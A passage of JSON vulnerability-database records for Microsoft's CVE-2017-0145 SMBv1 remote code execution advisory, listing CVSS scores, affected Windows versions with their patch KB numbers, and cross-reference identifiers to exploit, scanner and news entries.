"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T16:52:15", "differentElements": ["msAffectedSoftware"], "edition": 64}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T18:49:52", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012216", "KB4012213", "KB4012215", "KB4013198", "KB4014077", "KB4012212", "KB3205409", "KB3213986", "KBMS16-110, 3187754", "KB4013429", "KB3210720", "KB4012214", "KB3212646", "KB4012598", "KB4012217", "KB3210721", "KB3177186", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T18:49:52", "differentElements": ["msAffectedSoftware"], "edition": 65}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T20:59:37", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KB3210721", "KBMS16-110, 3187754", "KB3210720", "KB4012217", "KB3212646", "KB4012216", "KB4013198", "KB3205401", "KB4012214", "KB4012212", "KB4012215", "KB4014077", "KB4012598", "KB4013429", "KB4012606", "KB4012213", "KB3205409", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T20:59:37", "differentElements": ["msAffectedSoftware"], "edition": 66}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 